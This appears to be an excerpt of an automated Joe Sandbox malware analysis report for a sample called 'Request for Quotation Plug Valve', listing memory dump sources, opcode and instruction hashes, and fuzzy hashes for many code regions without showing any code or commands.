                                                                                      • Instruction ID: 7ee7bbceba8d759c13a2a2aa3d0665f7f3af6ad2f25a3b899514fc7f857260f1
                                                                                      • Opcode Fuzzy Hash: 07bb89531bc27885a1a38323110537c8759815deb2b355dab738772ddbb9777e
                                                                                      • Instruction Fuzzy Hash: 6E219F31A001499BCB15DB24D480AEE77B9EFDD360B50855AEC1A9B341DF31EA42CBD1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4706735919.000000000111D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0111D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_111d000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 846debc7202e16f8c653bdaea8bd3878bd72e1b19bdd10704a259912c1a0e20b
                                                                                      • Instruction ID: 311205662679f2324cb0efb649e4ba4eaded46ee811b2cb830cbec14ca91f79c
                                                                                      • Opcode Fuzzy Hash: 846debc7202e16f8c653bdaea8bd3878bd72e1b19bdd10704a259912c1a0e20b
                                                                                      • Instruction Fuzzy Hash: 3921F172504240EFDF09DF94E9C4B2AFF65FB88318F208569E9090A25AC336D456CAA2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e0b5781c92e6e6d2ea62622aa1e40ac85c99ebfc9ee8d77095f4a60b122490e6
                                                                                      • Instruction ID: 0e2c7685f89a0f90bc418b82f1a65d220317c33a0e8d0f2fbb024179ce858376
                                                                                      • Opcode Fuzzy Hash: e0b5781c92e6e6d2ea62622aa1e40ac85c99ebfc9ee8d77095f4a60b122490e6
                                                                                      • Instruction Fuzzy Hash: 732194314019129BC255CB3AC8C56D2BB5ABF8937C716831AC67C476EADB31E862CFD0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707045828.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_112d000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dea395c46c92b58869ed38b25a2c4c66b404d13a6350709e2207ce9ff217c997
                                                                                      • Instruction ID: 47fc359a50528e22d73227c5a0148c49933b8c4e24dce019a86aab54d82871fb
                                                                                      • Opcode Fuzzy Hash: dea395c46c92b58869ed38b25a2c4c66b404d13a6350709e2207ce9ff217c997
                                                                                      • Instruction Fuzzy Hash: BD213471504304EFDF1DCF64E9C0B26BB61FB84314F20C5ADE9090B262CB7AD866CA62
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 75f8e119484488b435f7a04be913d3409cea939b00f87e89c0253bb16d642fbe
                                                                                      • Instruction ID: 9dfffdcf569b7a5ec5b94075877c0c2c1e6db75dafa558ae622c7d6422ef49dd
                                                                                      • Opcode Fuzzy Hash: 75f8e119484488b435f7a04be913d3409cea939b00f87e89c0253bb16d642fbe
                                                                                      • Instruction Fuzzy Hash: 1B212331B04109DFDB069F68D6947AE3BB5EF58324F404424F8159B789CB78C991CBA0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: aa0a4671e230206318daee00af7136ef8517527be9312e9a252d166f9c69f77b
                                                                                      • Instruction ID: 5976b835852afe4a1bf4aef29c552ae55220d186ea23768e60d2decf91730086
                                                                                      • Opcode Fuzzy Hash: aa0a4671e230206318daee00af7136ef8517527be9312e9a252d166f9c69f77b
                                                                                      • Instruction Fuzzy Hash: 6B218D30E00249DFDF06CFA5E590AEEBFBAAF48204F148065E511E7291DB34D981DF60
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5b0949e65b20bea5bb91ae192be987ddc1135625e698da0c4c8d4a7c21da80df
                                                                                      • Instruction ID: bd97d6cf0bc41362a5095cb991588949a0e86607af003be49fefac3b814260fb
                                                                                      • Opcode Fuzzy Hash: 5b0949e65b20bea5bb91ae192be987ddc1135625e698da0c4c8d4a7c21da80df
                                                                                      • Instruction Fuzzy Hash: FD119072B102049BDB108F64D885ADEBBB9FF8C310F145025F915A3291DB719C50CB90
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6d448fa6e9c169bc969609a86197b47fef41d7edb47eb5d3cb472b0972cf9f1c
                                                                                      • Instruction ID: 3fc88f211b1442545cb6dc8bb45648daec8de6113d8a7437f674f67f0d9a4a57
                                                                                      • Opcode Fuzzy Hash: 6d448fa6e9c169bc969609a86197b47fef41d7edb47eb5d3cb472b0972cf9f1c
                                                                                      • Instruction Fuzzy Hash: F211E5353056119FD7165B2AC49497EB7AEFFC9B6530804B8E816CB395CF20DC01C790
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ca34ffaf8b6befaff5641fa88f15479eaebd0b71c4a1bf408356ecb99bb58cd9
                                                                                      • Instruction ID: b2328c07480a9bf7c3ccc8cff7dc2d57ddc585bf6f4680ae18c698f8fe46ed76
                                                                                      • Opcode Fuzzy Hash: ca34ffaf8b6befaff5641fa88f15479eaebd0b71c4a1bf408356ecb99bb58cd9
                                                                                      • Instruction Fuzzy Hash: A8216370D0024ADFDB04EFA8D58079EBFF1FB84304F0495A9C118AB659EB745A45CF80
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4706735919.000000000111D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0111D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_111d000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                                      • Instruction ID: 1e2ca4cc911d9a50f20dd447b336ace97662c8b4464f718e18a13b8b39004a88
                                                                                      • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                                      • Instruction Fuzzy Hash: 12119D76504280DFCF16CF54E5C4B16BF71FB84214F2485A9D8090A65AC33AD456CBA2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2f0e4d2fe5ff5129098a657aa03f3a22ffe9f955021de6a2acc4562bb19b2f85
                                                                                      • Instruction ID: 4a2ab731f1e513fd69fd3d0de1f1eb6872fdea21aef4ab34089e80d9b07a78be
                                                                                      • Opcode Fuzzy Hash: 2f0e4d2fe5ff5129098a657aa03f3a22ffe9f955021de6a2acc4562bb19b2f85
                                                                                      • Instruction Fuzzy Hash: A8113D7090020ADFDB44EFA8D58069EBFF2FB84304F1095A9C128AB659EB745A45CF80
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5db0bd24106ba5f93fc869ae825025a4ade9fe82dd8b4e10f9053992808f6d0e
                                                                                      • Instruction ID: dd655c9d09a3ebdc0597bd9263e6ef695c5df6780183e19d27a2146a6b40dab4
                                                                                      • Opcode Fuzzy Hash: 5db0bd24106ba5f93fc869ae825025a4ade9fe82dd8b4e10f9053992808f6d0e
                                                                                      • Instruction Fuzzy Hash: 9621CE74C1020A8FDB40EFA9D9456EEBBF4FB09300F10562AE805B3214EB305A84CFA0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707045828.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_112d000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                      • Instruction ID: 124a7b2dded1754e6e32a0e5dbb21c8c052d5314c2e38df3364010a8debc1a9e
                                                                                      • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                      • Instruction Fuzzy Hash: D211DD75504284CFCB1ACF64D9C4B15BFA2FB84314F24C6A9D8494B662C33AD45ACF62
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 82079b374273a2be8cae01aafe39c380a321ff6a0bfd91bdafdb4dbb90aec0ff
                                                                                      • Instruction ID: 3159ac38f5dfb763b2fea7666f8a508d3cba2528fa943f168e0607a83b5d5af9
                                                                                      • Opcode Fuzzy Hash: 82079b374273a2be8cae01aafe39c380a321ff6a0bfd91bdafdb4dbb90aec0ff
                                                                                      • Instruction Fuzzy Hash: 1D012832B042186BDB069F949890BEF3FABEBCC760F088029F504D7284CF718912CB90
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4f28bb9160dc5ff1449baaf3cab417748f48250db401d19bab6b70598a2cf725
                                                                                      • Instruction ID: 0e6458fc6092145510896677376faa365f2a7712756d90a0b19b8c25d4132f37
                                                                                      • Opcode Fuzzy Hash: 4f28bb9160dc5ff1449baaf3cab417748f48250db401d19bab6b70598a2cf725
                                                                                      • Instruction Fuzzy Hash: 4BF096313006104B97175B6E9494A6AB6EEFFC9A5A3554079F90AC7363EF71CC43C790
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 176ab6191be8caa705e339534c3c3368ccd2ee28693a159601076a220d915883
                                                                                      • Instruction ID: 0b677b9023593cf1be03df12e8ce1422f7416810a290a4d7088b2ee459210d29
                                                                                      • Opcode Fuzzy Hash: 176ab6191be8caa705e339534c3c3368ccd2ee28693a159601076a220d915883
                                                                                      • Instruction Fuzzy Hash: 730188B8D0020AEFDF00DFA8E984AEEBBB1FB49304F104065D914A3318D7306A62DF90
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0e196b074188cc8859e8f5efe5de3e04b799097cb8abbb7d8431653de8558396
                                                                                      • Instruction ID: 13b3185e7bce852f1cfe2a2a8668de38df7fd116bef755fbbd58113c9fd1205e
                                                                                      • Opcode Fuzzy Hash: 0e196b074188cc8859e8f5efe5de3e04b799097cb8abbb7d8431653de8558396
                                                                                      • Instruction Fuzzy Hash: 8FD0C2311096505BC317E22CAC008CB7F666DC2300350565AF00487A11CA945E0582E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b484eb3537d37d4a1d9cd7681343b7db6dbc21b431b0e8733585d82b9a151e6d
                                                                                      • Instruction ID: 892f10be61a64a328cce13cd92ad2cc45f5e7456089f179e263d5f3d02164c73
                                                                                      • Opcode Fuzzy Hash: b484eb3537d37d4a1d9cd7681343b7db6dbc21b431b0e8733585d82b9a151e6d
                                                                                      • Instruction Fuzzy Hash: 0CE0C232D2122B978B00E6A1EC004DFB738EE81220B844222E91033140EB702658C6A0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d61063065c8b271cf1228de443a778d639422f1f2ee151555fddecd9d7d5950b
                                                                                      • Instruction ID: 73aaf64c7bb5018b7e65ebf16bc7ffe48f22b4e9635f271f6c0d446ca8962ddd
                                                                                      • Opcode Fuzzy Hash: d61063065c8b271cf1228de443a778d639422f1f2ee151555fddecd9d7d5950b
                                                                                      • Instruction Fuzzy Hash: 57D02B31D2022B53CB00E7A1FC004DFF738EEC1220B404222E91033000FB302658C6F0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1a9ebad02803087ebba73c593a24610f71deebdcf726474144ed198cdb074031
                                                                                      • Instruction ID: 4c1976fd78c830522d3c7b80f13afde3c447d42d9ac3e8d0f21f5d3bacf2b949
                                                                                      • Opcode Fuzzy Hash: 1a9ebad02803087ebba73c593a24610f71deebdcf726474144ed198cdb074031
                                                                                      • Instruction Fuzzy Hash: 88D05B3111835A89E709A378A8467693F75A7C4134F449554E1450994DDFE818454751
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f86936d844d361f0181b58d8ce413ca51dac820445b1b055f7ddb9e6abcd5c99
                                                                                      • Instruction ID: de8e3d8f96a50186ce921aed62ef77527dac6f7be73cb0b606dc996b1cecc082
                                                                                      • Opcode Fuzzy Hash: f86936d844d361f0181b58d8ce413ca51dac820445b1b055f7ddb9e6abcd5c99
                                                                                      • Instruction Fuzzy Hash: 82D0673AB101089FDB049F98E8409DDF7B6FB98221B048126F915A3260C6319965DB50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 38dcff9c46e1a47f314ae2e2eac8d6cd9b060653649449c2ab02f50799d92c41
                                                                                      • Instruction ID: 51fb6da37fef1a3a912a0b78b89c6a7ae61262ae797d588fb522648605332253
                                                                                      • Opcode Fuzzy Hash: 38dcff9c46e1a47f314ae2e2eac8d6cd9b060653649449c2ab02f50799d92c41
                                                                                      • Instruction Fuzzy Hash: 4FC0123011431E8AD50DF779ED4561A3BAAE6D0218B40A528A1151A94DDFF81C454690
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cf0bedfdda3c81674c146dad6eb2f3375c5c169022f4c118fcfa8246b168dacc
                                                                                      • Instruction ID: 3c9d791c0ef3f3a833f8a9ccf422a2cb8c847d69bc67a7f029d419465e1e1739
                                                                                      • Opcode Fuzzy Hash: cf0bedfdda3c81674c146dad6eb2f3375c5c169022f4c118fcfa8246b168dacc
                                                                                      • Instruction Fuzzy Hash: 70C092212250D00EEA82A3A07AD53EDBF285B8D233F69E1A2E8C484E8388685847C200
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: "
                                                                                      • API String ID: 0-123907689
                                                                                      • Opcode ID: 7cedcc4cc0b929cf638eeb99be6c123eb6b89e14997292939783bb4152375efc
                                                                                      • Instruction ID: 2a3084cc6e0722f271b6d9f186591784cac48edb4a4a9e2585d08751421a45b7
                                                                                      • Opcode Fuzzy Hash: 7cedcc4cc0b929cf638eeb99be6c123eb6b89e14997292939783bb4152375efc
                                                                                      • Instruction Fuzzy Hash: 81F136B4E002588FEB14CFA9D48479EFBB2BF85314F24C269D448AB395D7B49986CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 83fddfb128531bf18806f49553fd657f0e516a80c86e93a86c91c1963f77efa6
                                                                                      • Instruction ID: c01fc8e9b3fcc399da0f413ddb6800d840ef8a6412094f137594075e2b647fe1
                                                                                      • Opcode Fuzzy Hash: 83fddfb128531bf18806f49553fd657f0e516a80c86e93a86c91c1963f77efa6
                                                                                      • Instruction Fuzzy Hash: 4A22E5219096C15BEB174B7CC4ABBEBBFF09F8B114B1944DEC9D24E20FDA259506CB42
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 34bf6965b8dba34f1122f095a1075b7e02e0a14a510d6be48f1ea005b71bf327
                                                                                      • Instruction ID: 6bbed3e6303a0b718309395c6ad7e3f331dfd549949f25a7b397af6441e97d63
                                                                                      • Opcode Fuzzy Hash: 34bf6965b8dba34f1122f095a1075b7e02e0a14a510d6be48f1ea005b71bf327
                                                                                      • Instruction Fuzzy Hash: 9652BA74E01228CFDB64DF69C984B9EBBB2BF89304F1085EAD409A7255DB709E81CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 30a32df4a36965d02aaabccdad95131f3a9ed646bdda213550c22db3dbdd0fab
                                                                                      • Instruction ID: 8c94657a4ba13736e673763fe438dcfda5e0740338564558115728e061fc13ba
                                                                                      • Opcode Fuzzy Hash: 30a32df4a36965d02aaabccdad95131f3a9ed646bdda213550c22db3dbdd0fab
                                                                                      • Instruction Fuzzy Hash: 8FA1B574B08259DBDB199B78D4642BEBBF7AFCC710B08856DD542E728ACE34C842C791
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3bc1aaf91716bedd98044ef80369286d3ac4737d8b371ee63274ad953e67e3d1
                                                                                      • Instruction ID: 5cfc213e73f56a40be078f5e84b6eedf2466662f206d762697cc39a9845de35a
                                                                                      • Opcode Fuzzy Hash: 3bc1aaf91716bedd98044ef80369286d3ac4737d8b371ee63274ad953e67e3d1
                                                                                      • Instruction Fuzzy Hash: EAC1C274E01218CFEB55DFA9C994B9DBBB2BF89300F2480A9D409AB359DB355E81CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9a62b05cbdf3b5ef40d0c09dedfc6029ac008c96de5746ba8d31768e1a2b28e8
                                                                                      • Instruction ID: 36584095f7b4022ff0288e6e58e34679bfd1b23c180107ae960c4db182d711da
                                                                                      • Opcode Fuzzy Hash: 9a62b05cbdf3b5ef40d0c09dedfc6029ac008c96de5746ba8d31768e1a2b28e8
                                                                                      • Instruction Fuzzy Hash: CAC1C278E01218CFDB55DFA9C984BADBBB2BF89300F2481A9D409AB355DB355E85CF10
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6a1a73c2dcda2bbbebc412ae9b31b4ef20ac4a6528bfdb9074d626186a1b75c4
                                                                                      • Instruction ID: d42c79208106b442045f27d5694a22dc8be7d9139b7cfcb151fd1077b708e7fa
                                                                                      • Opcode Fuzzy Hash: 6a1a73c2dcda2bbbebc412ae9b31b4ef20ac4a6528bfdb9074d626186a1b75c4
                                                                                      • Instruction Fuzzy Hash: EBC1B274E01218CFEB54DFA9C984BADBBB2BF89300F1081A9D419AB355DB359E85CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6cd70438fb9bac555f867ff4552e6bf6e44707e95e6597f6c1aab97b62384bab
                                                                                      • Instruction ID: 0f083afd817cbe468e82baeb89a499969ca0e905ac06c23110e6dfa6a0510d6f
                                                                                      • Opcode Fuzzy Hash: 6cd70438fb9bac555f867ff4552e6bf6e44707e95e6597f6c1aab97b62384bab
                                                                                      • Instruction Fuzzy Hash: ACC1C274E01218CFEB54DFA9C984B9DBBB2BF89300F1081A9D419AB355DB759E81CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c3dc236f7d1fce7a531b9a8088a673328adb9ce5082ef262ddcfd9e5196e4a9f
                                                                                      • Instruction ID: bbd38cf30caf500a5b692eb0cc5eec32fafb2633dd965495f08f4ff2cfad8439
                                                                                      • Opcode Fuzzy Hash: c3dc236f7d1fce7a531b9a8088a673328adb9ce5082ef262ddcfd9e5196e4a9f
                                                                                      • Instruction Fuzzy Hash: 14C1C278E01218CFEB54DFA9C984B9DBBB2BF89304F1080A9D419AB355DB359E81CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 51fcdac24abd7f7b78f116225b37502b50a1c35a973a4056cb7ad943999c6f69
                                                                                      • Instruction ID: cc1f1a9bcce0a3b8d10df8ee06b00da923fc0380d82f88b52e983486b6d7ceb9
                                                                                      • Opcode Fuzzy Hash: 51fcdac24abd7f7b78f116225b37502b50a1c35a973a4056cb7ad943999c6f69
                                                                                      • Instruction Fuzzy Hash: 25C1B378E01218CFEB54DFA9C984B9DBBB2BF89304F1080A9D519AB355DB359E81CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
